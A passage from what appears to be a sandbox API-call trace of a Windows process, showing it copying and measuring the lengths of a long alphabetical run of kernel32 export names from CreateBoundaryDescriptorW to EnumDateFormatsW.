lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0081.535] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0081.535] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0081.535] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0081.535] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0081.535] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0081.535] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0081.535] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0081.535] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0081.535] lstrlenA (lpString="CREATEEVENTA") returned 12 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0081.535] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0081.535] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0081.535] lstrlenA (lpString="CREATEEVENTW") returned 12 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0081.535] lstrlenA (lpString="CREATEFIBER") returned 11 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0081.535] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0081.535] lstrlenA (lpString="CREATEFILEA") returned 11 [0081.535] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0081.535] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0081.536] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0081.536] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0081.536] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0081.536] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0081.536] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0081.536] lstrlenA (lpString="CREATEFILEW") returned 11 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0081.536] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0081.536] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0081.536] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0081.536] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0081.536] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0081.536] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0081.536] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0081.536] lstrlenA (lpString="CREATEJOBSET") returned 12 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0081.536] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0081.536] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0081.536] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0081.536] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0081.536] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0081.537] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0081.537] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0081.537] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0081.537] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0081.537] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0081.537] lstrlenA (lpString="CREATEPIPE") returned 10 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0081.537] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0081.537] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0081.537] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0081.537] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0081.537] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0081.537] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0081.537] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0081.537] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0081.537] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0081.537] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0081.537] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0081.537] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0081.538] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0081.538] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0081.538] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0081.538] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0081.538] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0081.538] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0081.538] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0081.538] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0081.538] lstrlenA (lpString="CREATETHREAD") returned 12 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0081.538] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0081.538] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0081.538] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0081.538] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0081.538] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0081.538] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0081.538] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0081.538] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0081.538] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0081.538] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0081.538] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0081.539] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0081.539] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0081.539] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0081.539] lstrlenA (lpString="CTRLROUTINE") returned 11 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0081.539] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0081.539] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0081.539] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0081.539] lstrlenA (lpString="DEBUGBREAK") returned 10 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0081.539] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0081.539] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0081.539] lstrlenA (lpString="DECODEPOINTER") returned 13 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0081.539] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0081.539] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0081.539] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0081.539] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0081.539] lstrlenA (lpString="DELETEATOM") returned 10 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0081.539] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0081.539] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0081.539] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0081.540] lstrlenA (lpString="DELETEFIBER") returned 11 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0081.540] lstrlenA (lpString="DELETEFILEA") returned 11 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0081.540] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0081.540] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0081.540] lstrlenA (lpString="DELETEFILEW") returned 11 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0081.540] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0081.540] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0081.540] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0081.540] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0081.540] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0081.540] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0081.540] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0081.540] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0081.540] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0081.540] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0081.540] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0081.540] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0081.540] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0081.540] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0081.541] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0081.541] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0081.541] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0081.541] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0081.541] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0081.541] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0081.541] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0081.541] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0081.541] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0081.541] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0081.541] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0081.541] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0081.541] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0081.541] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0081.541] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0081.541] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0081.541] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0081.541] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0081.541] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0081.541] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0081.542] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0081.542] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0081.542] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0081.542] lstrcpyW (in: lpString1=0x10d0000, 